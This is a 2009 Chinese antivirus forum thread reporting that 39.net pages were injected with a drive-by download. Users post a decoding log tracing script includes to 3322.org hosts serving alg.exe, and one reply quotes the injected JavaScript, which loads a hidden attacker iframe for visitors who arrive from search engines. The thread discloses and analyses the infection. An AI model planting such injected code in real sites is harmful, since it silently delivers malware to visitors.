查看: 2085|回复: 5
收起左侧

[已鉴定] 39.net疑似被植入恶意木马 上万用户中招 挂马BY;taoyuan237

[复制链接]
王子带着刀
发表于 2009-7-25 16:54:43 | 显示全部楼层 |阅读模式
我帮朋友所发,他就一个360安全卫士都拦截

我的红伞P都没有报毒   他说直接进去不报毒,百度搜索进去才报

hxxp://www.baidu.com/s?ie=gb2312&bs=var+p%3Durl.toLowerCase%28%29.indexOf%28+www.baidu.com+%29%3B&sr=&z=&cl=3&f=8&wd=http%3A%2F%2Fsex.39.net%2Fxxl%2Ffqxxl%2F084%2F2%2F278466.html&ct=0  
再点第一个进去 360拦截木马  

未命名.jpg

[ 本帖最后由 taoyuan237 于 2009-7-25 17:10 编辑 ]
einnawy
发表于 2009-7-25 16:58:21 | 显示全部楼层
瑞星报了
gtyre1
发表于 2009-7-25 17:07:17 | 显示全部楼层
瑞星报的截个图来看下、、
taoyuan237
发表于 2009-7-25 17:09:33 | 显示全部楼层
关于:hxxp://sex.39.net/xxl/fqxxl/084/2/278466.html解密的日志(全体输出 -  31):

Level  0>http://sex.39.net/xxl/fqxxl/084/2/278466.html
Level  1>http://images.39.net/sex/js/art_sex.js
Level  2>http://disk.e165.com/new.js
Level  3>http://fdsa332dd.3322.org/ok/06.htm?03
Level  4>http://js.tongji.linezing.com/1213759/tongji.js
Level  4>http://fdsa332dd.3322.org/ok/fdsgfdsgrre44556431.html
Level  5>http://fdsa332dd.3322.org/ok/jhgftrdsa.htm
Level  6>http://55566884.3322.org/alg.exe
Level  5>http://fdsa332dd.3322.org/ok/gfddtt.htm
Level  6>http://fdsa332dd.3322.org/ok/go1.jpg
Level  6>http://fdsa332dd.3322.org/ok/go.jpg
Level  7>http://55566884.3322.org/alg.exe

Level  1>http://image.39.net/js/art_ok.js
Level  1>http://39net.datamaster.com.cn/dma.js?4713144b849e6
Level  1>http://image.39.net/js/function.js
Level  1>http://images.39.net/js/art_tips.js
Level  1>http://app-g.39.net/rel/k13.php?adid=77
Level  1>http://images.39.net/js/google/google_art_360_gy.js
Level  1>http://dpvc.39.net/adpolestar/lgs/door
Level  1>http://cpro.baidu.com/cpro/ui/cp.js
Level  1>http://images.39.net/js/baidu/baidu_art_360_1.js
Level  1>http://images.39.net/js/google/google_art_360_120.js
Level  1>http://app-g.39.net/rel/k13.php?adid=2
Level  1>http://dpvc.39.net/adpolestar/door
Level  1>http://app-g.39.net/rel/k13.php?adid=45
Level  1>http://app-g.39.net/rel/k13.php?adid=37
Level  1>http://app-g.39.net/rel/k13.php?adid=38
Level  1>http://comment-js.39.net/article/2784/278466.js
Level  1>http://comment-js.39.net/comment.js
Level  1>http://app-g.39.net/rel/k13.php?adid=34
Level  1>http://app-g.39.net/rel/k13.php?adid=103

日志由 Redoce2.0第13次修正版于 2009/7/25 17:09:16 生成。
挂的比较隐蔽

[ 本帖最后由 taoyuan237 于 2009-7-25 17:10 编辑 ]
250662772
发表于 2009-7-25 21:10:20 | 显示全部楼层
原帖由 王子带着刀 于 2009-7-25 16:54 发表
我帮朋友所发,他就一个360安全卫士都拦截

我的红伞P都没有报毒   他说直接进去不报毒,百度搜索进去才报

hxxp://www.baidu.com/s?ie=gb2312&bs=var+p%3Durl.toLowerCase%28%29.indexOf%28+w ...


只要是从下面的搜索进去的都会执行挂马,某则不会执行.
var url=document.referrer;
var p=url.toLowerCase().indexOf("www.baidu.com","search.cn.yahoo.com","www.soso.com","search.114.vnet.cn","zhidao.baidu.com","seek.3721.com","www.sogou.com","www.google.cn");
if (p>0)
{
document.writeln("
<iframe src=http:\/\/fdsa332dd.3322.org\/ok\/06.htm?03 width=111 height=0 border=0><\/iframe>");
}
llzy3575
发表于 2009-7-26 19:24:05 | 显示全部楼层
原帖由 250662772 于 2009-7-25 21:10 发表
只要是从下面的搜索进去的都会执行挂马,某则不会执行.
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-21 05:06 , Processed in 0.143125 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表